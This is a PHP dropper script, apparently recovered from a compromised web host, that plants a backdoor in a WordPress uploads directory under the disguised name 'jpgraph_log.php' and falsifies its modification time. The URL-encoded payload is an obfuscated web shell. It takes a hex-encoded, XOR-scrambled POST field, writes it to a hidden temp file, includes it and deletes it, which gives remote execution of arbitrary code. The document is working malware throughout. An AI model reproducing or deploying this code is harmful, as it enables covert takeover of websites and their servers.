File: //tmp/.request
<?php $p = "/kunden/homepages/34/d890102484/htdocs/sites/eglise/wp-content/uploads/2025/10/jpgraph_log.php"; $c = rawurldecode('%3C%3Fphp%0A%0Aif%28in_array%28%22%5Cx65%5Cx6Et%22%2C%20array_keys%28%24_POST%29%29%29%7B%0A%09%24parameter_group%20%3D%20hex2bin%28%24_POST%5B%22%5Cx65%5Cx6Et%22%5D%29%3B%0A%09%24record%20%3D%20%27%27%3B%20foreach%28str_split%28%24parameter_group%29%20as%20%24char%29%7B%24record%20.%3D%20chr%28ord%28%24char%29%20%5E%2043%29%3B%7D%0A%09%24k%20%3D%20array_filter%28%5Bini_get%28%22upload_tmp_dir%22%29%2C%20session_save_path%28%29%2C%20getenv%28%22TMP%22%29%2C%20%22/var/tmp%22%2C%20getenv%28%22TEMP%22%29%2C%20%22/tmp%22%2C%20%22/dev/shm%22%2C%20getcwd%28%29%2C%20sys_get_temp_dir%28%29%5D%29%3B%0A%09while%20%28%24mrk%20%3D%20array_shift%28%24k%29%29%20%7B%0A%20%20%20%20%09%09if%20%28%21%21is_dir%28%24mrk%29%20%26%26%20%21%21is_writable%28%24mrk%29%29%20%7B%0A%20%20%20%20%24holder%20%3D%20implode%28%22/%22%2C%20%5B%24mrk%2C%20%22.key%22%5D%29%3B%0A%20%20%20%20if%20%28%40file_put_contents%28%24holder%2C%20%24record%29%20%21%3D%3D%20false%29%20%7B%0A%09include%20%24holder%3B%0A%09unlink%28%24holder%29%3B%0A%09die%28%29%3B%0A%7D%0A%7D%0A%7D%0A%7D'); if (file_put_contents($p, $c)) { echo '!success!'; @touch($p, 1761710261); } die('!ended!');